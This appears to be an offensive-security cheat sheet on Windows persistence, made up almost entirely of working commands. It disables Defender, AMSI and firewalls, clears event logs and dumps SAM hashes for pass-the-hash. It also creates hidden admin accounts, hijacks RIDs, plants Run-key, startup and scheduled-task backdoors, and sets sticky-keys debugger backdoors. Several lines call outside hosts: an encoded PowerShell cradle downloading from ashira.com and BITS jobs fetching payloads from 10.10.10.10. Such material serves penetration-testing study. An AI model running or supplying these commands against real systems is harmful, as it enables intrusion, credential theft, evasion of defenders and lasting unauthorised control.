Windows Persistence
2024-03-05 20:30:12

Disable Antivirus and Security

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Disable Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true

## Exclude a process / location / extension
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\
Add-MpPreference -ExclusionExtension "exe", "txt", "dll"

# Disable scanning all downloaded files and attachments, disable AMSI (reactive)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
# Disable AMSI (set to 0 to enable)
PS C:\> Set-MpPreference -DisableScriptScanning 1

# Disable Windows Defender Security Center
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

Disable Firewalls

1
2
3
4
5
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

# ip whitelisting
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Clear Logs

1
2
cmd.exe /c wevtutil.exe cl System
cmd.exe /c wevtutil.exe cl Security

Credentials

1
2
3
4
5
6
7
8
reg save hklm\sam c:\sam
reg save hklm\system c:\system

# Transfer SAM and System to attacker then:

samdump2 system sam 
# OR
secretsdump.py -sam sam -system system LOCAL
1
2
3
$ evil-winrm -i MACHINE_IP -u Administrator -H <hash>
$ psexec.py <domain>/Administrator@MACHINE_IP -hashes <hash>
$ crackmapexec smb MACHINE_IP -d <domain> -u Administrator -H <hash> -x <command>

Tampering With Accounts

Enable admin account and set password:

1
2
net user administrator /active:yes
net user administrator <password>

Assign Group Memberships

1
2
3
4
5
C:\> net user kage password123 /add
C:\> net localgroup Administrators kage /add
C:\> net localgroup "Backup Operators" kage /add
C:\> net localgroup "Remote Management Users" kage /add
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Special Privileges and Security Descriptors

  • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
  • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.
    1
    2
    3
    secedit /export /cfg config.inf
    secedit /import /cfg config.inf /db config.sdb secedit /configure /db config.sdb /cfg config.inf
    Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI # Set perms to user with all access

RID Hijacking

msf: post/windows/manage/rid_hijack

1
2
3
4
5
C:\> wmic useraccount get name,sid
C:\tools> PsExec64.exe -i -s regedit

# Convert user RID to hex value and find them at HKLM\SAM\SAM\Domains\Account\Users\
# Modify F value to F401 (RID 500 in little-endian) at position 0x30

HKCU / HKLM Registry Autoruns

CMD/Powershell:

1
2
3
4
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v NotEvil /t REG_SZ /d "C:\backdoor.exe"

SharPersist:

1
2
3
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add

Startup Folder

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup - user specific
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp - all users will run

1
2
PS C:\> gc C:\Users\kage\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\kage\AppData\Local\Temp\backdoor.exe
1
2
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
SharPersist -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA=" -f "Updater" -m add

Scheduled Tasks

Pinned:

1
2
3
PS C:\Users\kage> $str = 'IEX ((new-object net.webclient).downloadstring("http://ashira.com/a"))'
PS C:\Users\kage> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA=
1
2
3
4
# Every minute
schtasks /create /sc minute /mo 1 /tn "NotEvil" /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA="

SharPersist -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBhAHMAaABpAHIAYQAuAGMAbwBtAC8AYQAiACkAKQA=" -n "Updater" -m add -o hourly

CMD:
/sc <scheduletype>

1
2
3
4
5
6
7
8
9
10
MINUTE - Specifies the number of minutes before the task should run.
HOURLY - Specifies the number of hours before the task should run.
DAILY - Specifies the number of days before the task should run.
WEEKLY Specifies the number of weeks before the task should run.
MONTHLY - Specifies the number of months before the task should run.
ONCE - Specifies that that task runs once at a specified date and time.
ONSTART - Specifies that the task runs every time the system starts. You can specify a start date, or run the task the next time the system starts.
ONLOGON - Specifies that the task runs whenever a user (any user) logs on. You can specify a date, or run the task the next time the user logs on.
ONIDLE - Specifies that the task runs whenever the system is idle for a specified period of time. You can specify a date, or run the task the next time the system is idle.
ONEVENT - Specifies that the task runs based on an event that matches information from the system event log including the EventID.
1
2
3
4
5
6
7
8
9
10
11
# Run every minute
schtasks /create /sc minute /mo 1 /tn "NotEvil" /tr C:\revshell.exe
schtasks /create /sc minute /mo 1 /tn "NotEvil" /tr C:\revshell.exe /ru "SYSTEM" # run as SYSTEM

# Create the scheduled tasks to run once at 00.00
schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
# Force run it now !
schtasks /run /tn "Device-Synchronize"

# Launch an executable by calling the ShellExec_RunDLL function.
SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE

Powershell:

1
2
3
4
5
6
7
8
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Kage"
PS C:\> $P = New-ScheduledTaskPrincipal "Kage"
# or for SYSTEM
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

SharPersist:

  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is to add the task (you can also removecheck and list).
  • -o is the task frequency (daily, hourly, logon, defaults to daily).
    1
    2
    3
    4
    5
    6
    # Add to a current scheduled task
    SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

    # Add new task
    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly

Making Our Tasks Invisible

Delete task Security Descriptor (SD). Must have SYSTEM privs.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\

1
2
3
PsExec64.exe -s -i regedit # Open regedit with SYSTEM priv

# Find the task in the tree and delete it's SD value

BITS Jobs

1
2
3
4
5
6
7
8
9
10
11
bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe"  "C:\tmp\evil.exe"

# v1
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor

# v2 - exploit/multi/script/web_delivery
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
bitsadmin /resume backdoor

RDP Backdoor

Utilman.exe

At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

sethc.exe

Hit F5 a bunch of times when you are at the RDP login screen.

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Auto Logon

Note: apparently doesn’t work on RDP anymore.

  1. Win + R
  2. netplwiz
  3. Uncheck “Users must enter a user name and password to use this computer”

If option not there, add this reg key:

1
reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PasswordLess\Device" /v DevicePasswordLessBuildVersion /t REG_DWORD /d 0 /f

Alternatively, set value “AutoAdminLogon” to 1 in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and fill out DefaultUserName and DefaultPassword.

1
2
3
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ -d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ -d "kage" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ -d "kage" /f
2024-03-05 20:30:12